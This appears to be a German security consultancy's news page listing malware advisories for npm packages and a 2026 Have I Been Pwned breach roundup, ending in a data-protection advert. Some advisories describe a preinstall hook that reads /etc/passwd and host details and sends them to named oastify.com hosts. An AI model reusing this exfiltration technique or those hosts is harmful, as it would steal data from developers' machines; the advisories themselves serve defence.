--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (4c988ef2dab3264cefcab98e4aae196d6c45b5555b22641e5862d89bde83815b) The package was found to contain malicious code or consuming dependency that contains malicious code ## Source: ghsa-malware (3f49e49ca1c452b8174beb6fde58222d8eeff2d24b020f2d9291c46848f72fd6) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-15890 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (508695a38291fb41f6ca49b06070cf670e079fd43796e1812acabdd467ba9166) The package was found to contain malicious code or consuming dependency that contains malicious code ## Source: ghsa-malware (5c68dc3e69414953764c46bd4fe9fb262f379fbf9849d29c4ff57720489806cd) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-14138 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (72b7bcd65cbf07a90130de5e4a29fb72bc99badb287a1e1dc7373c288a1ae0be) package.json declares `preinstall: node index.js`, causing index.js to run automatically on `npm install`. The script collects host identifiers (os.hostname(), os.userInfo(), homedir, DNS servers, __dirname, package.json contents) and reads /etc/passwd and /etc/hosts, then POSTs the payload over HTTPS to aguu8c8gjyt4anjao3nhru1mgdm5avyk.oastify.com, a Burp Collaborator out-of-band interaction subdomain. The package name resembles legitimate Optimizely/Fastly Compute tooling, consistent with a dependency-confusion or typosquat exfiltration beacon. ## Source: ghsa-malware (98d06e1f8396a59663b9e65d9d7cbffcd454526fc2aadbfa4d634c6a05f9543d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-14434 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (3553acd3c5abc3f71b55740c4b06b2eb278f81bb678c55211f2287a498b60b61) The package's preinstall hook runs index.js, which collects the installer's hostname, username, home directory, DNS servers, current working directory, package.json contents, and the contents of /etc/passwd and /etc/hosts, then POSTs them over HTTPS to the hardcoded Burp Collaborator subdomain vjib8dmg59zuxwwymzboy0ymhdn4bvzk.oastify.com. Execution is automatic on npm install via the preinstall lifecycle script, with no user interaction required. ## Source: ghsa-malware (178dd717df84bb7119c6604010a4e3902fb9c232f9c2279389fd6d7e45ee483f) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-16034 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (10907c74bd3094d2b21cc247498cb53b280d3e6bdb6947b86f17bee73b8eec7f) The package was found to contain malicious code or consuming dependency that contains malicious code ## Source: ghsa-malware (f264e9423adc999377519d6da580a609869844b11b7739a19d0bb8fa1ca763e6) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Das "CVE"-Repository (eng. Common Vulnerabilities and Exposures) stellt eine Liste bekannter Schwachstellen und Sicherheitslücken in IT-Systemen unter Führung des "US-amerikanischen National Cybersecurity" zusammen und bewertet diese anhand Ihres Risikos auf einer Skala von eins bis zehn.


Gerade im Bereich von Web-Technologien und Cloud-Software werden regelmäßig Hacks und Sicherheitslücken bekannt. Die betroffenen Unternehmen erleiden in der Regel nicht nur einen Image-Schaden sondern stehen womöglich gegenüber Ihren Kunden auch in der rechtlichen Verantwortung. Das Projekt "Have I Been Pwned" sammelt seit Jahren Daten die aus Hacks oder Datenlecks öffentlich zugänglich werden und bietet einen Service um zu prüfen, ob man selbst von diesen Hacks betroffen wurde.

27.08.2026 - Manchester Airports Group 8.849.657 Datensätze geleaked
Browser user agent details, Email addresses, Geographic locations, IP addresses, Names, Phone numbers, Purchases, Vehicle registration plates

In August 2026, Manchester Airports Group (MAG) disclosed a data breach impacting their services. The incident was later claimed by the FulcrumSec hacking group, who subsequently published email addresses and phone numbers relating to 8.8M customers of Manchester, Stansted and East Midlands airports. The data contained personal information relating to airport services, including vehicle registrations and parking history, Fast Track purchases and lounge bookings. In their disclosure notice, MAG advised that "at no point has passenger safety or aviation security been compromised".
15.08.2026 - Oz Hair and Beauty 1.988.331 Datensätze geleaked
Email addresses, Geographic locations, Names, Phone numbers, Purchases

In August 2026, Australian beauty retailer Oz Hair and Beauty was the target of an xpl0itrs extortion attack. The group subsequently published data allegedly obtained from the company, which included 2M unique email addresses along with names, phone numbers, geographic locations (suburb and postcode) and purchases.
13.08.2026 - Carhartt 12.933.413 Datensätze geleaked
Email addresses, Names, Phone numbers, Physical addresses

In August 2026, clothing retailer Carhartt was the target of a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data allegedly obtained from the company including 12.9M unique email addresses, names, phone numbers and physical addresses. The published corpus also contained millions of synthetic records that did not relate to real individuals and were excluded from the breach.
06.08.2026 - Fanlore 144.520 Datensätze geleaked
Email addresses, Names, Passwords, Usernames

In August 2026, the Organization for Transformative Works (OTW) identified unauthorised access to the Fanlore wiki it operates. The breach resulted in the exposure of 145k unique email addresses along with usernames and passwords stored as either MD5 or PBKDF2 hashes. OTW self-submitted the exposed data to HIBP.
01.08.2026 - Alcon 218.395 Datensätze geleaked
Email addresses, Names, Phone numbers, Physical addresses

In August 2026, the Alcon eye care company was named in a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data allegedly sourced from Alcon containing 218k unique email addresses along with other largely corporate B2B contact fields, including name, phone number and physical address.
01.08.2026 - Questel 1.226.209 Datensätze geleaked
Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses, Support tickets

In August 2026, the French intellectual property software and services company Questel was the target of a ShinyHunters "pay or leak" extortion campaign. The group subsequently published an extensive corpus of data they alleged was obtained from the company, largely comprising corporate contact information associated with sales leads, support cases and marketing activities, with 1.2M unique email addresses. The data also included names, employers and job titles, along with physical addresses and phone numbers.
27.07.2026 - RingCentral 1.596.490 Datensätze geleaked
Email addresses, Names, Phone numbers, Physical addresses

In July 2026, the cloud-based business communications platform RingCentral was the target of a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data they claimed was obtained from the platform, which included 1.6M unique email addresses along with names, physical addresses and phone numbers. In their disclosure notice, RingCentral advised that the incident affected "a limited portion of RingCentral customers" and that it was communicating directly with those affected.
21.07.2026 - SplitVPN 865.336 Datensätze geleaked
Device information, Email addresses, Geographic locations, IP addresses, Partial credit card data

In July 2026, the Russian VPN service SplitVPN (previously known as NotVPN) suffered a data breach. The incident exposed millions of customer records, including 865k unique email addresses. Other impacted data included IP addresses, the user's country, and partial payment card data (first 6 and last 4 digits plus expiry date).
15.07.2026 - Exact Sciences 10.869.543 Datensätze geleaked
Dates of birth, Email addresses, Genders, Names, Personal health data, Phone numbers, Physical addresses

In July 2026, Exact Sciences (now owned by Abbott Laboratories) was the target of a ShinyHunters "pay or leak" extortion campaign. The group claimed to have obtained data from the company's cancer diagnostics business, which they later published publicly. The breach contained 10.9M unique email addresses belonging to customers, patients and healthcare providers, along with names, addresses, phone numbers and health records. Abbott subsequently published a public notice advising that "some of the impacted files contain personal information and/or personal health information" and that more specific information would follow once their review of the incident was complete. For context, Exact Sciences is the maker of the Cologuard at-home colorectal cancer screening test.
13.07.2026 - Brinks Home 732.162 Datensätze geleaked
Dates of birth, Email addresses, Names, Partial credit card data, Phone numbers, Physical addresses, Purchases

In July 2026, Brinks Home was targeted in a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data they alleged was taken from the company, including 732k unique email addresses and other personal information relating to leads, customers and Brinks staff such as name, phone numbers and physical addresses. The data also included purchases from Brinks along with partial credit card data (last 4 digits, card type and expiry). In Brinks' disclosure notice, they acknowledged the incident and risk of disclosure, and advised that they would notify impacted parties "consistent with applicable law".
01.07.2026 - Fluke 821.100 Datensätze geleaked
Email addresses, Employers, Job titles, Names, Physical addresses, Support tickets

In July 2026, electronic test and measurement equipment company Fluke was targeted in a ShinyHunters "pay or leak" extortion campaign. The group subsequently published more than 100GB of data allegedly taken from the company. The corpus contained largely corporate contact information, including over 800k unique email addresses, names, phone numbers and physical addresses. A large collection of support cases was also present.
18.06.2026 - Inter-Con Security 276.114 Datensätze geleaked
Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses

In June 2026, Inter-Con Security was targeted in a ShinyHunters “pay or leak” extortion campaign. The group subsequently published data it alleged was taken from the company, including 276k unique email addresses along with names, physical addresses, job titles and phone numbers. The data encompassed a combination of contacts, internal users and leads.
18.06.2026 - Operation Endgame 4.0 4.348.526 Datensätze geleaked
Email addresses, Passwords

On 18 June 2026, the latest phase of Operation Endgame targeted the SocGholish malware operation, a prolific malware distribution network used to compromise systems and facilitate further cybercrime. Coordinated by international law enforcement agencies with support from Europol and Eurojust, the operation remediated almost 15,000 compromised websites and disrupted more than 100 servers and domains used to distribute malware. Authorities initially provided HIBP with 154k impacted email addresses and more than half a million previously unseen passwords. The following week, a further 4M email addresses and 9M passwords relating to the StealC malware operation also targeted by Operation Endgame were provided, followed by another 131k email addresses the following month, bringing the total to more than 4.3M unique email addresses.
16.06.2026 - Houston City College 831.642 Datensätze geleaked
Academic records, Citizenship statuses, Dates of birth, Email addresses, Genders, Names, Phone numbers, Physical addresses

In June 2026, Houston City College was the target of a ShinyHunters "pay or leak" extortion campaign. Data allegedly obtained from the college was later published publicly and included 832k unique email addresses along with names, addresses, phone numbers, academic records, and other personal information relating to both current students and alumni.
15.06.2026 - Glendale Community College 793.925 Datensätze geleaked
Academic records, Dates of birth, Email addresses, Genders, Government issued IDs, Names, Phone numbers, Physical addresses

In June 2026, Glendale Community College was the target of a ShinyHunters "pay or leak" extortion campaign. Data allegedly obtained from Glendale was later published online and included almost 800k unique email addresses along with various other data fields, including names, addresses, phone numbers, Social Security numbers and other information relating to student enrolments. In its disclosure notice, the college advised that "the potentially impacted information may vary for each individual and may include all or just one of the above-listed types of information".
15.06.2026 - June 2026 Stealer Logs 56.278.397 Datensätze geleaked
Email addresses, Passwords

In June 2026, a collection of accumulated stealer logs from various sources was added to HIBP. The corpus comprised 56M unique email addresses across hundreds of millions of stealer log records. The data also contained 124M unique passwords, which have been added to Pwned Passwords and are now searchable. Individuals can view any records captured against their email address in the stealer logs section of their dashboard. Organisations can see logs affecting their domain via the stealer logs API.
15.06.2026 - Moody Bible Institute 2.303.416 Datensätze geleaked
Dates of birth, Email addresses, Genders, Marital statuses, Names, Phone numbers, Physical addresses

In June 2026, Moody Bible Institute was targeted by a ShinyHunters "pay or leak" extortion campaign. Over 2.3M unique email addresses and other personal data were later published publicly, including names, physical addresses, phone numbers, dates of birth and other information relating to donors, supporters, students and alumni. In their disclosure notice, Moody advised that they had "engaged both internal and external cybersecurity experts to thoroughly investigate the matter".
15.06.2026 - Sysco 2.691.852 Datensätze geleaked
Customer feedback, Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses, Usernames

In June 2026, the food distribution company Sysco was targeted by a ShinyHunters "pay or leak" extortion campaign. Data was subsequently published containing 2.7M unique email addresses belonging to staff and customers. The data also contained largely corporate contact information including names, phone numbers, physical addresses, internal job titles, and customer feedback.
12.06.2026 - American Tower 216.601 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses

In June 2026, telecommunications tower infrastructure company American Tower was the target of a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data allegedly taken from the company containing more than 200k unique email addresses belonging to employees, contractors, customers, and leads. Exposed data also included names, addresses, and phone numbers.
12.06.2026 - JCPenney 368.418 Datensätze geleaked
Dates of birth, Email addresses, Government issued IDs, Job titles, Names, Phone numbers, Physical addresses, Usernames

In June 2026, retailer JCPenney and associated brands were targeted in a ShinyHunters "pay or leak" extortion campaign. Data allegedly obtained from JCPenney through the exploitation of a critical zero-day vulnerability in Oracle PeopleSoft was later published publicly. The exposed records indicated they primarily related to internal HR systems and impacted current and former employees. The data included 368k corporate and personal email addresses, names, dates of birth, Social Security numbers, phone numbers and home addresses.
11.06.2026 - Ralph Lauren 139.903 Datensätze geleaked
Age groups, Email addresses, Genders, Names, Phone numbers

In June 2026, fashion retailer Ralph Lauren was targeted in a ShinyHunters "pay or leak" extortion campaign. The group subsequently published hundreds of gigabytes of data they claimed was obtained from the organisation's Salesforce instance, including 140k unique email addresses along with names, phone numbers, genders and age groups.
09.06.2026 - Goose Creek 6.574.121 Datensätze geleaked
Email addresses, Names, Phone numbers, Physical addresses, Purchases

In June 2026, a party claiming to have access to data from Goose Creek Candle Company sent emails to a number of the company's customers, claiming the company had a security vulnerability and suffered a data breach. The data was subsequently sent to Have I Been Pwned and contained 6.6M unique email addresses along with names, phone numbers, physical addresses, order IDs and total spent. The data appears to have been obtained from the company's Shopify instance. Goose Creek is aware of the reports but was unable to provide Have I Been Pwned with any further information at the time of publication.
09.06.2026 - University of Nottingham 454.635 Datensätze geleaked
Academic records, Citizenship statuses, Dates of birth, Disabilities, Email addresses, Ethnicities, Genders, IP addresses, Names, Passport numbers, Phone numbers, Physical addresses, Purchases, Salutations, Usernames

In June 2026, the University of Nottingham was the target of a cyber attack, later linked to a ShinyHunters "pay or leak" extortion campaign. Tens of gigabytes of data were subsequently published online and included 455k unique email addresses along with extensive personal information including names, addresses, phone numbers, ethnicities, disabilities, passport numbers and information relating to academic enrolments and fee payments. In a post about the incident, the university advised that the breach affected both "current students, and alumni".
05.06.2026 - Madison Square Garden Sports 9.796.738 Datensätze geleaked
Customer service records, Email addresses, Names, Phone numbers, Physical addresses

In June 2026, the sports and entertainment company Madison Square Garden Sports was the target of a ShinyHunters "pay or leak" extortion campaign. The group later published the alleged data, which included almost 10M unique email addresses spanning staff and customers, along with extensive personal, employment and customer relationship information.
30.05.2026 - Atlas Menu 63.926 Datensätze geleaked
Email addresses, IP addresses, Passwords, Support tickets, Usernames

In May 2026, the GTA V and CS2 cheat service Atlas Menu suffered a data breach. An attacker claimed to have gained access to all Atlas systems and published the service's database to a public GitHub repository. The incident exposed 64k unique email addresses along with usernames, IP addresses, support tickets and passwords stored as bcrypt hashes.
29.05.2026 - BCD Travel 396.313 Datensätze geleaked
Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses, Support tickets

In May 2026, the corporate travel management company BCD Travel was claimed as a victim of the ShinyHunters "pay or leak" extortion campaign. Data allegedly obtained from BCD was subsequently published publicly in early June and contained 396k unique email addresses. Other exposed data included names, addresses, phone numbers, job titles and employer names, spanning a variety of different data sets including leads, internal staff and support tickets.
23.05.2026 - Baker Distributing 102.935 Datensätze geleaked
Email addresses, Names, Phone numbers, Physical addresses, Support tickets

In May 2026, the HVAC/R wholesale distributor Baker Distributing Company was added to the ShinyHunters data extortion group's "pay or leak" site. In early June, the group publicly published data they claimed had been obtained from Baker's SharePoint and Salesforce infrastructure including 103k unique email addresses along with names, physical addresses, phone numbers and tickets relating to the company's HVAC contractor customer base. The exposed data was largely corporate contact and support information with limited sensitivity.
23.05.2026 - Charter 4.851.517 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses

In May 2026, the telecommunications company Charter Communications (the parent company behind the consumer broadband and cable brand Spectrum) was named by the ShinyHunters group in a "pay or leak" extortion campaign. The group later published the data, which exposed 4.9M unique email addresses along with names, phone numbers and physical addresses. A subset of approximately 85k records originating from an internal employee directory also included job titles. Charter confirmed the incident, but stated that no sensitive personal information or customer proprietary network information (CPNI) was exfiltrated.
23.05.2026 - DentaQuest 2.553.599 Datensätze geleaked
Dates of birth, Email addresses, Genders, Government issued IDs, Health insurance information, Names, Phone numbers, Physical addresses

In May 2026, the dental benefits administrator DentaQuest was the target of a ShinyHunters "pay or leak" extortion campaign that resulted in the group publicly publishing hundreds of gigabytes of data allegedly obtained from the company. The data included 2.6M unique email addresses along with names, addresses and phone numbers. Much of the data appeared in healthcare enrollment files (ASC X12 transaction sets) with some containing Medicaid IDs, while additional data appeared in member records and related files. DentaQuest acknowledged "a cybersecurity incident involving unauthorized access to a limited portion of our network", and advised they had contained the attack and mitigated the threat.
14.05.2026 - Golf Canada 568.972 Datensätze geleaked
Dates of birth, Email addresses, Genders, Geographic locations, Names, Usernames

In mid-2026, hundreds of thousands of user records allegedly sourced from Golf Canada began circulating via Telegram. The data included 569k unique email addresses along with names, usernames, dates of birth, genders and approximate geographic locations (city, province and postcode). It remains unclear whether the data was obtained via unintentionally exposed website features or a security vulnerability.
05.05.2026 - Cushman & Wakefield 310.431 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations

In May 2026, the real estate services firm Cushman & Wakefield was the target of a "pay or leak" extortion campaign by the ShinyHunters group. Following the threat, the group publicly published data they alleged had been obtained from the firm, consisting mostly of C&W email addresses along with tens of thousands of external email addresses and corporate contact records. The exposed data was primarily business information, including names, job titles, company addresses and phone numbers.
30.04.2026 - Reborn Gaming 126 Datensätze geleaked
Email addresses, IP addresses

In April 2026, the gaming community Reborn Gaming suffered a data breach due to a vulnerability in cPanel and WebHost Manager (WHM). The breach exposed 126 unique email addresses along with IP addresses and Steam IDs. Reborn Gaming self-submitted the data to Have I Been Pwned.
28.04.2026 - Vimeo 119.167 Datensätze geleaked
Email addresses, Names

In April 2026, the ShinyHunters extortion group listed Vimeo on their extortion portal as part of their "pay or leak" campaign. They subsequently published hundreds of gigabytes of data, predominantly consisting of video titles, technical data and metadata. The data also included 119k unique email addresses, sometimes accompanied by names. Vimeo attributed the exposure to a breach of Anodot, a third-party analytics vendor, and advised the incident does not include "Vimeo video content, valid user login credentials, or payment card information".
26.04.2026 - CTT 468.124 Datensätze geleaked
Email addresses, Names, Phone numbers

In April 2026, data allegedly obtained from CTT, Portugal's national postal service, was posted to a public hacking forum. The data included 468k unique email addresses along with names, phone numbers and parcel tracking numbers which can be used to retrieve the tracking history of the parcel.
24.04.2026 - Udemy 1.401.259 Datensätze geleaked
Email addresses, Employers, Job titles, Names, Payment methods, Phone numbers, Physical addresses

In April 2026, online training company Udemy was the victim of a “pay or leak” extortion attempt perpetrated by the ShinyHunters group. The data was subsequently leaked publicly and contained 1.4M unique email addresses belonging to customers and instructors. The data also included names, physical addresses, phone numbers, employer information and instructor payout methods including PayPal, cheque and bank transfer.
20.04.2026 - ADT 5.488.888 Datensätze geleaked
Dates of birth, Email addresses, Names, Partial government issued IDs, Phone numbers, Physical addresses

In April 2026, home security firm ADT confirmed a data breach by ShinyHunters, which listed the company on its website as part of a "pay or leak" extortion attempt. The breach impacted 5.5M unique email addresses along with names, phone numbers and physical addresses. ADT also advised that "in a small percentage of cases, dates of birth and the last four digits of Social Security numbers or Tax IDs were included" and that it had contacted all affected people.
20.04.2026 - Aman 215.563 Datensätze geleaked
Dates of birth, Email addresses, Genders, Language preferences, Names, Nationalities, Phone numbers, Physical addresses, Spouses names, VIP statuses

In April 2026, the ultra-luxury hotel brand Aman was named by ShinyHunters as the target of a "pay or leak" extortion campaign, with the data allegedly obtained from their Salesforce CRM. The data was subsequently leaked publicly and contained over 200k unique email addresses. Whilst not present on all records, the data also included genders, physical addresses, phone numbers, nationalities, dates of birth, spouse names and VIP status codes.
20.04.2026 - Canada Life 237.810 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations, Support tickets

In April 2026, Canada Life was the victim of a "pay or leak" extortion campaign by the ShinyHunters group. The group subsequently published the data which contained over 200k unique email addresses along with names, phone numbers, physical addresses and, in some cases, customer support tickets. In their disclosure notice, Canada Life advised that "it is a small proportion of our customers who may have been impacted". In the wake of the incident, Canada Life also published an alert cautioning customers to be wary of phishing attacks, a pattern often seen after the public release of breached data.
20.04.2026 - Pitney Bowes 8.243.989 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses

In April 2026, the hacking collective ShinyHunters claimed to have obtained data from Pitney Bowes as part of a broader extortion campaign that also named several other organisations. After negotiations allegedly failed, the group publicly released the data which included 8.2M unique email addresses, along with names, phone numbers and physical addresses. A subset of the data also included Pitney Bowes employee records with job titles.
18.04.2026 - Carnival 7.531.359 Datensätze geleaked
Dates of birth, Email addresses, Genders, Geographic locations, Loyalty program details, Names, Salutations

In April 2026, the notorious hacking collective ShinyHunters claimed they had obtained a substantial volume of data belonging to the Carnival cruise operator and attempted to extort the organisation to prevent the data from being leaked. The following week, the group published the data publicly, which contained 8.7M records with 7.5M unique email addresses. The data contained fields indicating it related to the Mariner Society loyalty program run by Holland America, a cruise line brand under Carnival, and included names, dates of birth, genders and data relating to status within the loyalty program. Carnival acknowledged a phishing incident involving a single user account and advised they were working to better understand the scope of the unauthorised activity.
Sind Sie betroffen? Hier prüfen!






Unsere TÜV-geprüften Berater sind für Sie da!

Wir haben Experten sowohl für die rechtlichen Anforderungen durch die DSGVO und das Bundesdatenschutzgesetz als auch für die technische Seite der IT-Sicherheit. Wir können Sie dahingehend über mögliche technische Risiken und Schutzmaßnahmen gleichermaßen beraten wir zur Umsetzung der gesetzlichen Anforderungen an den Datenschutz im Unternehmen und im Verein. Von den technischen und organisatorischen Maßnahmen über das Verfahrensverzeichnis sowie die praktische Umsetzung der Vorgaben können wir Sie gerne unterstützen.

Unsere Datenschutz-Experten beraten Sie gerne »





Keine Angst vor der DSGVO - wir helfen!










© 2012 - 2026 | SD Software-Design GmbH
Impressum | Datenschutz | Karriere | Online-Services